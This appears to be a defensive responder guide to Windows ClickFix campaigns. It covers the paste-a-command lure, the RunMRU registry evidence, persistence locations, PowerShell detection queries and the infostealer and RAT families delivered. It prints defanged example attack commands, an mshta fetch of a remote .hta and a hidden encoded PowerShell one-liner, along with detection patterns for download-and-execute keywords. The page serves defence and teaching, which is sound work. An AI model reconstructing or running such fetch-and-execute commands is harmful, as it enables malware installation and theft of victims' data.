For responders · Windows
Technical analysis & indicators of compromise
Windows ClickFix campaigns swap payloads constantly, so the reliable indicators are behavioural and artifact-based, not a single file hash. This page documents the execution chain, the registry artifact that survives, where persistence lives, and the families seen in 2025–2026.
If you’re here to recover rather than analyse, the recovery protocol and the clean & rebuild guide are the practical paths. macOS analysis →
How it works
The attack chain
A fake CAPTCHA or “fix this error” page copies a command to the clipboard and instructs the victim to run it. Three delivery surfaces are common: the Win+R Run dialog (paste → Enter); the Win+X Quick Access menu to open a terminal first (which sidesteps the Run dialog’s history); and “FileFix”, pasting into the File Explorer address bar. The Explorer route is notable because content launched there carries no Mark-of-the-Web, so it can slip past SmartScreen, and the address bar — unlike the Run dialog — can’t practically be disabled by Group Policy.
The pasted command almost always launches a trusted, signed Windows binary (a “living-off-the-land” binary) to fetch and run the next stage, so it blends into normal activity: most often mshta.exe or powershell.exe, sometimes wscript.exe, certutil.exe, or rundll32.exe. That stage pulls down the real payload — an infostealer and/or remote-access trojan. Some 2026 variants hide the final payload inside PNG pixel data (steganography) and rebuild it in memory to defeat file scanning.
What the malicious command looks like (defanged — not runnable)
Shown only so the pattern is recognisable. Payloads and addresses are redacted and these will not run. The universal tell: a web page telling you to paste anything into Run, a terminal, or the address bar is an attack.
# via the Run box (mshta fetching a remote HTML application)
mshta hxxp://«redacted»/«x».hta
# or a hidden, encoded PowerShell one-liner
powershell -w hidden -e «base64 — REDACTED»A legitimate-looking file path is often appended after a # comment so the visible part looks benign while the malicious prefix runs. Don’t reconstruct or run these; the artifact checks below identify them safely.
The surviving artifact
RunMRU — the smoking gun
When the lure uses the Run dialog, Windows records what was typed there in a registry key. It keeps the most recent entries (the last 26), so after a Run-dialog ClickFix the exact malicious line is usually still sitting in RunMRU — the single best confirmation, and a clean indicator for an incident report. (The Win+X and Explorer-address-bar variants deliberately avoid this key, so its absence doesn’t clear you.)
Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"Entries naming mshta, powershell, curl, certutil, or a raw URL are the attack. Correlate with process-creation and script-block logs below for timing and what executed.
Persistence
Where it restarts itself
Windows stealers re-launch from a small set of well-known locations. Check each; the free Autoruns tool (Sysinternals) shows them all at once and flags unsigned or oddly-pathed entries.
| Mechanism | Location |
|---|---|
| Run / RunOnce keys | HKCU\…\CurrentVersion\Run · HKLM\…\CurrentVersion\Run · …\RunOnce |
| Scheduled tasks | Task Scheduler · C:\Windows\System32\Tasks\ |
| Startup folder | shell:startup · shell:common startup |
| Services | unexpected auto-start services pointing at user-writable paths |
| WMI subscriptions | __EventFilter / CommandLineEventConsumer (advanced) |
Read-only verification (responder)
Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run","HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ScheduledTask | Where-Object State -ne 'Disabled' | Select-Object TaskName, TaskPath
Get-ChildItem "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"# Event 4688: powershell/mshta spawned by explorer.exe is a red flag
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} -MaxEvents 200 -ErrorAction SilentlyContinue |
Where-Object { $_.Message -match 'mshta|powershell|wscript|certutil|rundll32' }
# Event 4104: the actual script content that ran
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} -ErrorAction SilentlyContinue |
Where-Object { $_.Message -match 'IEX|DownloadString|FromBase64|mshta' } | Select-Object TimeCreated -First 20Get-MpThreatDetection | Sort-Object InitialDetectionTime -Descending | Select-Object -First 20Process-creation logging (Event 4688) and PowerShell script-block logging (4104) aren’t always on by default; if they’re empty, that’s a gap, not an all-clear.
Payloads
Common families (2025–2026)
ClickFix is a delivery technique, not one malware family — what it drops changes month to month. Treat this as orientation, not a fixed indicator set. Families repeatedly seen behind Windows ClickFix include:
- Infostealers — Lumma (LummaC2), StealC, Vidar, DanaBot. Steal browser data, passwords, crypto wallets and session cookies.
- Remote-access trojans — AsyncRAT, NetSupport RAT, Interlock RAT, and the Havoc framework. Give hands-on-keyboard control.
- Cross-platform backdoors — e.g. GolangGhost (linked to the Lazarus group), delivered to Windows and macOS via fake job-interview / driver-fix lures.
Why this page is pattern-based, not hash-based
Unlike the macOS page — built from one fully analysed sample — there is no single Windows binary to pin down here, and any hash, domain, or IP would be stale within weeks. The durable indicators are the chain itself: a web page prompting a paste, a LOLBin (mshta/PowerShell) spawned from explorer.exe, a fresh entry in RunMRU, and new persistence in a Run key or scheduled task. Detect on those, and confirm the family with an up-to-date scan and a VirusTotal lookup of any recovered file.
Sources & further reading
References
Public threat-research on Windows ClickFix mechanics, the RunMRU artifact, LOLBin chains, and observed payloads:
- Palo Alto Unit 42 — Preventing the ClickFix attack vector (Win+X variant, Event IDs, LOLBins).
- Rapid7 — ClickFix campaign & the RunMRU detection (RunMRU tracks the last 26 Run commands).
- Revel8 — ClickFix attacks in 2026 (FileFix / Mark-of-the-Web bypass, PNG steganography, observed payloads).